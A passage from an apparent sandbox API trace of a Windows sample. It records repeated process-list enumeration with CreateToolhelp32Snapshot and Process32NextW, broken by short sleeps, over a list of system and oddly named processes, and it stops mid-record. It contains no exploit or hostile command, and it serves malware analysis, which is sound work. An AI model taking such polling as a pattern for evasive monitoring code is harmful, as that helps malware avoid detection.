th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0105.749] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0105.750] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0105.751] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0105.752] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0105.753] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0105.754] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0105.755] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.756] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0105.756] CloseHandle (hObject=0xc4) returned 1 [0105.757] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0105.761] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0105.762] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0105.763] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0105.764] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0105.764] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0105.765] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0105.766] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0105.766] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0105.767] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0105.767] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0105.768] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.769] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.770] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.770] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.771] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.772] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0105.772] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.773] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.773] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0105.775] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.808] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0105.809] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0105.811] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0105.812] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0105.813] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.814] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0105.815] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0105.816] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0105.817] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0105.818] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0105.820] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0105.821] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0105.822] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0105.823] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0105.824] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0105.825] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0105.826] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0105.827] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0105.828] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0105.829] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0105.830] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0105.831] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0105.832] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0105.833] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0105.834] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0105.835] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0105.836] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.837] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0105.838] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0105.839] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0105.840] CloseHandle (hObject=0xbc) returned 1 [0105.840] Sleep (dwMilliseconds=0x12c) [0106.151] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0106.156] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0106.157] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0106.158] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0106.158] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0106.159] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0106.160] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0106.160] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0106.161] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0106.162] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0106.162] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0106.163] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.164] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.164] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.165] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.166] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.166] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0106.167] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.168] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.168] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0106.169] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.171] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0106.172] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0106.173] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0106.174] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: 